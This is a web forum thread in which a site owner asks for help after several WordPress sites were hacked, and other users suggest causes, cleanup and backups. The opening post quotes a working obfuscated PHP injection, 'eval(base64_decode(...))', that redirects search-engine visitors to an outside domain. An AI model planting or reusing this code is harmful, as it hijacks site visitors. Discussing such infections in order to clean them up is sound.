Being Hacked F$$$KJ$K$JK

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
What the fuck, this godamn mother fucker hacked multiple sites of mine. How the hell did they hack multiple sites and how the hell did my host let this happen? He installed this on almost all of my php files. I had my sites updated with the latest wordpress and had security plugins.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

I know this is going to take forever and I'm losing money. FUCK what do I do?
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
Do you mean how do you get rid of this and get your sites back to normal or how do you prevent it happening again?
 

navero

Newbie
Joined
Jan 9, 2012
Messages
2
Reaction score
0
Lemme help you, type base64 decoder in google, then go to hack forums, make a new account, check search for anything related to script kiddies :p. problem solved
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
It's a Joomla hack.

Here's a fix:

http://www.kiveo.net/blog/joomla-osa-pl-code-injection/

Actually he seems to be attacking multiple holes, it could be one of many.

If it's wordpress you're using try this http://www.xphp.info/security/new-threat-pokosa-malware/
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
Also, I'd recommend you study this and implement all of it http://codex.wordpress.org/Hardening_WordPress
 

GraveDigger00

Registered Member
Joined
Jul 24, 2011
Messages
88
Reaction score
9
It can also be injected into WordPress, I have had similar code on my sites. I had a horrible hosting company, and their shared servers overall were getting exploited and then my sites as well, multiple times. I moved my sites to new hosting, and it hasten happened since, shocking... It could also be timthumb being exploited if a WordPress theme. Make sure to update all of your themes and plugins and versions, and change your passwords as well.
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
Thanks for all the replies, ya it's wordpress and I'm using different themes for sites that got hacked. It could be a plugin, I don't understand why the screen is white with a 0. It's not re-directing any traffic to anywhere so why did they hack my sites? Just to mess with people? I don't see a reason.
 

n3xus

Junior Member
Joined
Apr 19, 2009
Messages
121
Reaction score
32
honestly sometimes people pull this shit for the pure enjoyment of being a dick. just like those bastards that make viruses just to fuck with people. its sad that they use their intelligence for such purposes
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
Thanks for all the replies, ya it's wordpress and I'm using different themes for sites that got hacked. It could be a plugin, I don't understand why the screen is white with a 0. It's not re-directing any traffic to anywhere so why did they hack my sites? Just to mess with people? I don't see a reason.

It's a pretty widespread attack so the site has probably been taken down now.

It was most likely something like a browser exploit to build a botnet or install adware/malware/crapware/cockware
 

phpbuilt

Elite Member
Joined
May 16, 2011
Messages
1,669
Reaction score
5,341
White screen with a 0 means your default wordpress template got deleted out of your wp database, or doesn't exist anymore ... to fix it just go into wordpress backend and select a theme (should fix it).

What was your host? Justhost is notorious for this. It could have gotten in through the host.

It might have gotten in through your templates. For instance, even if wordpress is fully up to date with all plugins ... it is possible that your wordpress theme (if it is an old one) would rely on something like timthumbs, which was exploited ... and you need a new copy of that template with a fixed timthumbs or you can always be hacked (just updating wordpress and plugins/widgets are not enough). Stay away from templates that are no longer supported.
 

phpbuilt

Elite Member
Joined
May 16, 2011
Messages
1,669
Reaction score
5,341
and I'm using different themes for sites that got hacked

That theme could be using timthumbs. Timthumbs is something that many theme developers insert into their themes to help them automatically resize images (for instance, it will take the first image in your post and resize it to a thumbnail that can be stuck on your homepage with a description of the article).

http://blog.trendmicro.com/attacks-target-timthumb-vulnerability/ (article about timthumbs vulnerability).

If it is not timthumbs, it could be something similar. I would suggest that you switch off the templates that are giving you problems, or find updated versions of those same templates which are sure to be fixed.
 

macdonjo3

Jr. VIP
Jr. VIP
Joined
Nov 8, 2009
Messages
8,285
Reaction score
8,484
It happens. If you're with host winds, just email them and they'll help you sort it out.
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
Well it sounds like I'm screwed. I have ipage and they're saying that it's my problem and I need to re-install everything. I noticed that code is all over all the php files and in some it's 30 or 40 times. I backed up my databases and I have all my images. I know I have to sync up my database with my domain. So all my content should be in my database right? I'm just not sure what is the best and least painful way of doing all this for 6 sites. Does the content just show up under the right permalinks? I'm just lost on what to do now or what to start with. FML, any help would be good.
 

resistancee

Registered Member
Joined
Jun 22, 2011
Messages
99
Reaction score
40
First clean your pc. Boot into safe mode, clean with malware malbytes and combofixer. Once your clean contact your host for FTP logs. Find out what he edited, remove the code he added or files he's added and install Eset nod32!
 

PHustler

Jr. VIP
Jr. VIP
Joined
Feb 17, 2010
Messages
185
Reaction score
20
Let this be a warning to everyone.....BACKUP YOUR SITES!!!!
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
ya I made sure my pc was clean I ran it with multiple tools like crazy. Not sure I can remove all the code, like I said it's in pretty much every php file 30 or 40 times. I'll check the ftp logs and check out eset nod32 thanks. I think it was an automated thing cuz other sites I have weren't affected.

and yes backup your sites, databases and everything you can. This really sucks.

First clean your pc. Boot into safe mode, clean with malware malbytes and combofixer. Once your clean contact your host for FTP logs. Find out what he edited, remove the code he added or files he's added and install Eset nod32!
 
Last edited:

raven123

Regular Member
Joined
Jan 18, 2012
Messages
456
Reaction score
281
You should post your host here so people can safely move before something like this happens again. I hope like hell it isn't bluehost...

I usually use BackUpWordpress to counter these situations. I get my sites mailed to me several times every day. Take a not of this.
 

Dumper

Supreme Member
Joined
Mar 20, 2009
Messages
1,461
Reaction score
541
Yeah everytime i change something i back it up. If your host can't help you then there's not much else you can do other then move on and kick them fuckers to the curb. Get hostgator...
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
I have ipage and they SUCK, don't use them. They're slow to start, customer service sucks and they haven't helped at all. I have db backup that sends me emails too and have all my latest ones. I'm just not sure, do I just erase everything in the ftp folders, re-install wordpress and then I should be good? This is a dumb question but do databases contain all your posts and images? I guess I'm just not sure what I should delete overwrite and everything.
 
Top